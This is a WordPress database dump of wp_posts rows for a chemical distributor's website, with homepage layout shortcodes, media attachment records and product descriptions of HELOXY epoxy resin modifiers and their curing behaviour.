INSERT INTO `wp_posts` VALUES (1214, 1, '2016-09-02 17:45:58', '2016-09-02 17:45:58', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" bg="#002c56" link="https://www.miller-stephenson.com/chemicals/release-agents/" text_color="light" text_width="60%" text_bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner link="https://www.miller-stephenson.com/chemicals/release-agents/" height="240px" bg="86" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button text="RELEASE AGENTS" link="chemicals/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="chemicals/krytox/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™<br>&amp; LUBRICANTS" link="chemicals/krytox-tribosys-finish-line/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="chemicals/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS<br>&amp; SOLVENTS" link="chemicals/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="chemicals/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY<br>&amp; CONFORMAL COATINGS" link="chemicals/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL<BR>CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="chemicals/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO<BR>RADICAL INITIATORS" link="chemicals/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n<h3>Technical Support</h3>\r\nOur team of experts are available to provide you with a level of service and attention unsurpassed in the industry.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Application Experts</h3>\r\nWith over 50 years of knowledge &amp; experience, Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n<h3>Large Inventory</h3>\r\nWe are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys <strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="30px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="607" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="627" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image title="FluoroExtreme" id="624" image_size="Original"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="626"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="610"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[gap height="30px"]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-02 17:45:58', '2016-09-02 17:45:58', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1215, 3, '2016-09-02 18:03:57', '2016-09-02 18:03:57', '', 'heloxy 116', '', 'inherit', 'open', 'closed', '', 'heloxy-116', '', '', '2016-09-02 18:03:57', '2016-09-02 18:03:57', '', 1212, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-116.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1216, 3, '2016-09-02 18:11:56', '2016-09-02 18:11:56', '', 'HELOXY™ 62', 'HELOXY™Modifier 62 is a commercial grade of o-cresyl glycidyl ether. A low viscosity aromatic monoepoxide, its primary use is the viscosity reduction of conventional epoxy resin systems. Benefits include:\r\n<ul>\r\n 	<li>Reduces viscosity of higher molecular weight aromatic epoxy resins</li>\r\n 	<li>Excellent retention of mechanical and chemical resistance cured state properties relative to othermonoepoxides</li>\r\n 	<li>Low volatility</li>\r\n 	<li>Improves substrate and filler wetting of conventional formulations</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-62', '', '', '2016-09-21 15:06:27', '2016-09-21 15:06:27', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1216', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1217, 3, '2016-09-02 18:10:57', '2016-09-02 18:10:57', '', 'heloxy 62', '', 'inherit', 'open', 'closed', '', 'heloxy-62', '', '', '2016-09-02 18:10:57', '2016-09-02 18:10:57', '', 1216, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-62.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1218, 2, '2016-09-02 18:18:26', '2016-09-02 18:18:26', '', 'opteon-solvent-banner', '', 'inherit', 'open', 'closed', '', 'opteon-solvent-banner', '', '', '2016-09-02 18:19:31', '2016-09-02 18:19:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/opteon-solvent-banner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1220, 3, '2016-09-02 18:21:53', '2016-09-02 18:21:53', '', 'HELOXY polyfunctional', '', 'inherit', 'open', 'closed', '', 'heloxy-polyfunctional', '', '', '2016-09-02 18:21:53', '2016-09-02 18:21:53', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-polyfunctional.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1221, 3, '2016-09-02 19:02:25', '2016-09-02 19:02:25', '', 'HELOXY™ 48', 'HELOXY™ Modifier 48 is a low viscosity aliphatic triglycidyl ether useful in the viscosity, reactivity, and performance modification of epoxy resin systems. Applications can be fast setting adhesives, Low temperature curing floor surfacing and concrete patching compounds, hard abrasion resistant clear castings and decoupage systems. Benefits include:\r\n\r\n&nbsp;', 'publish', 'open', 'closed', '', 'heloxy-48', '', '', '2016-09-21 15:04:41', '2016-09-21 15:04:41', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1221', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1222, 3, '2016-09-02 19:01:38', '2016-09-02 19:01:38', '', 'heloxy 48', '', 'inherit', 'open', 'closed', '', 'heloxy-48', '', '', '2016-09-02 19:01:38', '2016-09-02 19:01:38', '', 1221, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-48.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1223, 2, '2016-09-02 19:09:43', '2016-09-02 19:09:43', '', 'miller-stephenson-banner', '', 'inherit', 'open', 'closed', '', 'miller-stephenson-banner-2', '', '', '2016-09-02 19:10:12', '2016-09-02 19:10:12', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/miller-stephenson-banner-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1224, 3, '2016-09-02 19:15:27', '2016-09-02 19:15:27', '', 'HELOXY™ 68', 'HELOXY™Modifier 68 is a diglycidyl ether of neopentyl glycol and is primarily used as a reactive diluent or viscosity reducing modifier for all classes of epoxy resins. Benefits include:\r\n<ul>\r\n 	<li>Reduces viscosity while maintaining most cured state properties</li>\r\n 	<li>Improves wetting characteristics</li>\r\n 	<li>Facilitates air release</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-68', '', '', '2016-09-21 15:07:44', '2016-09-21 15:07:44', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1224', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1225, 3, '2016-09-02 19:13:58', '2016-09-02 19:13:58', '', 'HELOXY™ 48', '<p>HELOXY™ Modifier 48 is a low viscosity aliphatic triglycidyl ether useful in the viscosity, reactivity, and&nbsp;performance modification of epoxy resin systems. Applications can be fast setting adhesives,&nbsp;Low temperature curing floor surfacing and concrete patching compounds, hard abrasion resistant clear castings and decoupage systems. Benefits include:</p><p><br></p>', 'inherit', 'closed', 'closed', '', '1221-autosave-v1', '', '', '2016-09-02 19:13:58', '2016-09-02 19:13:58', '', 1221, 'https://132.148.10.86/wordpress/1221-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1226, 3, '2016-09-02 19:15:02', '2016-09-02 19:15:02', '', 'heloxy 68', '', 'inherit', 'open', 'closed', '', 'heloxy-68', '', '', '2016-09-02 19:15:02', '2016-09-02 19:15:02', '', 1224, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-68.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1227, 3, '2016-09-02 19:18:02', '2016-09-02 19:18:02', '<strong>Product Description- </strong>HELOXY 107 is the diglycidyl ether of cyclohexane dimethanol. While it is primarily used as a reactive diluent or viscosity reducing modifier for epoxy resin formulations, it also can effectively serve as a reactive intermediate for further synthesis of various cycloaliphatic based resins.\r\n\r\n<strong>Application Areas/Suggested Uses</strong>\r\n<ul>\r\n 	<li>\r\n<div class="Section1">To improve air release and wetting characteristics or to increase pot life in electrical, potting, encapsulation, and impregnation applications</div></li>\r\n 	<li>\r\n<div class="Section1">To maintain high reactivity yet provide workable viscosity at room temperature when using novolac or other high functionality epoxy resins</div></li>\r\n</ul>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>Reduces viscosity of epoxy formulations while maintaining most cured state properties</li>\r\n 	<li>Provides excellent cured state resistance to creep or deformation under high stress</li>\r\n 	<li>Is an effective means of incorporating a cycloaliphatic structure into the polymer chain</li>\r\n</ul>\r\n<strong>General Information</strong>\r\n\r\nHELOXY 107 is fully compatible with the entire bisphenol <span class="GramE">A</span> based series of epoxy resins as well as higher functionality epoxy resins. Concentrations of up to 40 percent of HELOXY Modifier 107 have been employed for viscosity reduction. Performance properties of systems containing this resin are maintained at higher modifier concentrations than is possible with monoepoxide diluents and most diepoxide diluents.\r\n\r\nEffect of HELOXY 107 modifications on the properties of various EPON™ Resin 828 based systems is demonstrated by data presented in Table 1. Substituting HELOXY Modifier 107 for Epon Resin 828 or other unmodified resins generally results in slight increases in flexibility. As with all diluting modifiers, use of HELOXY Modifier 107 decreases chemical resistance and elevated temperature performance. To minimize such losses, the lowest concentration of HELOXY Modifier 107 necessary to obtain desired reduction in viscosity should be used.\r\n\r\nWhen formulating with HELOXY Modifier 107, the concentration of curing agent to be used will likely be different than in the case of an unmodified system. The proper curing agent combining ratio should always be calculated in order to ensure proper stoichiometric balance.\r\n\r\nMiller-Stephenson is an Epon, Epikure, EPONEX, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'HELOXY™ 107', 'HELOXY™ Modifier 107 is the diglycidyl ether of cyclohexane dimethanol. While it is primarily used as a reactive diluent or viscosity reducing modifier for epoxy resin formulations, it also can effectively serve as a reactive intermediate for further synthesis of various cycloaliphatic based resins. Benefits include:\r\n<ul>\r\n 	<li>Reduces viscosity of epoxy formulations while maintaining most cured state properties</li>\r\n 	<li>Provides excellent cured state resistance to creep or deformation under high stress</li>\r\n 	<li>Effective means of incorporating a cycloaliphatic structure into the polymer chain</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-107', '', '', '2016-11-24 20:48:09', '2016-11-24 20:48:09', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1227', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1228, 3, '2016-09-02 19:17:35', '2016-09-02 19:17:35', '', 'heloxy 107', '', 'inherit', 'open', 'closed', '', 'heloxy-107', '', '', '2016-09-02 19:17:35', '2016-09-02 19:17:35', '', 1227, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-107.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1229, 3, '2016-09-02 19:22:14', '2016-09-02 19:22:14', '', 'HELOXY flexibilizers', '', 'inherit', 'open', 'closed', '', 'heloxy-flexibilizers', '', '', '2016-09-02 19:22:14', '2016-09-02 19:22:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/HELOXY-flexibilizers.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1230, 3, '2016-09-02 19:28:51', '2016-09-02 19:28:51', '<strong>Product Description-</strong> HELOXY 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance to thermal shock when blended with conventional liquid bisphenol A based epoxy resins.\r\n\r\n<span style="text-decoration: underline;">Application Areas/Suggested Uses </span>\r\n<ul>\r\n 	<li>Body solders</li>\r\n 	<li>Adhesives</li>\r\n 	<li>Caulking and sealing compounds</li>\r\n 	<li>Electrical casting and encapsulating</li>\r\n 	<li>Glass to metal glazing compositions</li>\r\n 	<li>Large castings</li>\r\n 	<li>Tooling compositions</li>\r\n 	<li>Filament winding</li>\r\n</ul>\r\n<strong>Benefits </strong>\r\n<ul>\r\n 	<li>A low-viscosity flexibilizer that serves as a viscosity depressing agent.</li>\r\n 	<li>A product that improves impact strength and toughness to a conventional liquid bisphenol A epoxy resin.</li>\r\n</ul>\r\n<strong>Curing Agents </strong>\r\n\r\nBlends of HELOXY 71 and EPON™ Resin 828 can be cured with all curing agents except the polyamine adducts (i.e., EPIKURE™ Curing Agent 3282), which produce incompatible cured products. Depending upon the ratio of resin blend and the hardener used, the elongation at break can range as high as 200-300%, although 50-100% is more common. The use of HELOXY 71 as the sole resin in a formulation is not recommended. As in the case of most common flexibilizers, high concentrations of HELOXY Modifier 71 tend to decrease the superior chemical resistance of unmodified epoxy resin systems. Also, experience has shown that optimum tensile properties are normally reached with elevated temperature cures because there is a tendency for room temperature amine cured systems to age harden. Results obtained with various curing agent systems reported in the following sections are intended as a guide when selecting an EPON Resin 828/HELOXY Modifier 71/ EPIKURE Curing Agent system for your specific application.\r\n\r\n<strong>Cure with Aliphatic Amine Curing Agents</strong>\r\n\r\nBlends of HELOXY 71 and EPON Resin 828 cured with aliphatic amines yield a wide range of flexible to semi-rigid polymers. The final properties of these polymers are affected by the type of amine curing agent and the ratio of HELOXY Modifier 71 to EPON Resin 828. Although most of the data presented in this technical bulletin is based on systems cured at elevated temperatures, data is included which show that EPI-CURE Curing Agents 3223 and 3200 are effective room temperature curing agents.\r\n\r\n<strong>Cure with an Aromatic Diamine</strong>\r\n\r\nHELOXY Modifier 71 and EPON Resin 828 cured with ANCAMINE® Z (4,4\'- Methylenedianiline), an aromatic diamine, are summarized. You will note a wide range of tensile properties can be achieved depending on the ratio of EPON Resin 828 and HELOXY Modifier 71.\r\n\r\n<strong>Cure with Acid Anhydrides</strong>\r\n\r\nAs with amine curing agents, acid anhydrides can be used with HELOXY Modifier 71 or blends of this resin with EPON Resin 828 to produce tough, flexible polymers. Curing agent accelerators or catalysts, such as EPIKURE Curing Agent 3253 or benzyl dimethylamine (Aceto Corporation), are used to reduce the required HELOXY Modifier 71 HCD-2638 (Rev. 11/7/2016 3:28:44 PM) Page 2 of 7 cure time and cure temperature. Table 5 displays data on HELOXY Modifier 71 cured with two popular acid anhydrides. Table 6 displays tensile properties of several blends of HELOXY 71 and EPON Resin 828 cured with NADIC Methyl Anhydride. Again, you will note that adjusting the flexibilizer level in the EPON Resin 828 allows broad latitude in formulating a system with the desired tensile strength and elongation properties\r\n\r\n<strong>Cure with Lewis Acids or Accelerators</strong>\r\n\r\n75/25 by weight blend of HELOXY Modifier 71/ EPON Resin 828, cured with various levels of boron trifluoride monoethylamine. In this study, four parts of boron trifluoride monoethylamine appears to be the optimal level of Lewis acid. Another study was undertaken to determine the effect of phenolic accelerators on the properties of HELOXY Modifier 71 systems. Our laboratory determined that a formulator could add up to 5 parts of phenol per 100 parts of HELOXY 71 with no effect on tensile elongation. Higher levels of phenol decrease tensile strength and exhibit a deleterious effect on chemical resistance.\r\n\r\nMiller-Stephenson is an Epon, Epikure, EPONEX, and Heloxy Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'HELOXY™ 71', 'HELOXY™ Modifier 71 is an undiluted amber colored, low-viscosity liquid, aliphatic epoxy ester resin that imparts increased flexibility and resistance to thermal shock when blended with conventional liquid bisphenol A based epoxy resins. Benefits include:\r\n<ul>\r\n 	<li>A low-viscosity flexibilizer that serves as a viscosity depressing agent.</li>\r\n 	<li>A product that improves impact strength and toughness to a conventional liquid bisphenol A epoxy resin.</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'heloxy-71', '', '', '2016-11-24 20:45:43', '2016-11-24 20:45:43', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1230', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1231, 3, '2016-09-02 19:26:31', '2016-09-02 19:26:31', '', 'heloxy 71', '', 'inherit', 'open', 'closed', '', 'heloxy-71', '', '', '2016-09-02 19:26:31', '2016-09-02 19:26:31', '', 1230, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/heloxy-71.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1232, 2, '2016-09-02 19:27:52', '2016-09-02 19:27:52', '', 'conformal-coatings', '', 'inherit', 'open', 'closed', '', 'conformal-coatings', '', '', '2016-09-02 19:29:47', '2016-09-02 19:29:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/conformal-coatings.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1237, 2, '2016-09-06 15:01:21', '2016-09-06 15:01:21', '', 'contact-cleaners', '', 'inherit', 'open', 'closed', '', 'contact-cleaners', '', '', '2016-09-06 15:01:34', '2016-09-06 15:01:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/contact-cleaners.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1238, 2, '2016-09-06 15:03:08', '2016-09-06 15:03:08', '', 'specialty-solvents', '', 'inherit', 'open', 'closed', '', 'specialty-solvents', '', '', '2016-09-06 15:03:31', '2016-09-06 15:03:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/specialty-solvents.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1239, 2, '2016-09-06 15:05:15', '2016-09-06 15:05:15', '', 'flux-removers', '', 'inherit', 'open', 'closed', '', 'flux-removers', '', '', '2016-09-06 15:05:28', '2016-09-06 15:05:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/flux-removers.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1240, 2, '2016-09-06 15:06:47', '2016-09-06 15:06:47', '', 'media-head-cleaners', '', 'inherit', 'open', 'closed', '', 'media-head-cleaners', '', '', '2016-09-06 15:07:01', '2016-09-06 15:07:01', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/media-head-cleaners.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1241, 2, '2016-09-06 15:08:55', '2016-09-06 15:08:55', '', 'plastic-metal-glass-cleaner', '', 'inherit', 'open', 'closed', '', 'plastic-metal-glass-cleaner', '', '', '2016-09-06 15:09:18', '2016-09-06 15:09:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/plastic-metal-glass-cleaner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1242, 2, '2016-09-06 15:10:51', '2016-09-06 15:10:51', '', 'solvent-cleaners', '', 'inherit', 'open', 'closed', '', 'solvent-cleaners', '', '', '2016-09-06 15:11:04', '2016-09-06 15:11:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/solvent-cleaners.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1244, 2, '2016-09-06 15:35:13', '2016-09-06 15:35:13', '', 'medical-chemicals', '', 'inherit', 'open', 'closed', '', 'medical-chemicals', '', '', '2016-09-06 15:35:26', '2016-09-06 15:35:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/medical-chemicals.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1247, 2, '2016-09-06 18:01:13', '2016-09-06 18:01:13', '', 'releasys-release-agents', '', 'inherit', 'open', 'closed', '', 'releasys-release-agents', '', '', '2016-09-06 18:01:13', '2016-09-06 18:01:13', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/releasys-release-agents.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1248, 2, '2016-09-06 18:01:15', '2016-09-06 18:01:15', '', 'solvsys', '', 'inherit', 'open', 'closed', '', 'solvsys', '', '', '2016-09-06 18:01:15', '2016-09-06 18:01:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/solvsys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1249, 2, '2016-09-06 18:01:16', '2016-09-06 18:01:16', '', 'tribosys', '', 'inherit', 'open', 'closed', '', 'tribosys-2', '', '', '2016-09-06 18:01:16', '2016-09-06 18:01:16', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1250, 2, '2016-10-04 13:12:38', '2016-10-04 13:12:38', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id=""]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-autosave-v1', '', '', '2016-10-04 13:12:38', '2016-10-04 13:12:38', '', 64, 'https://132.148.10.86/wordpress/64-autosave-v1/', 0, 'revision', '', 0); 
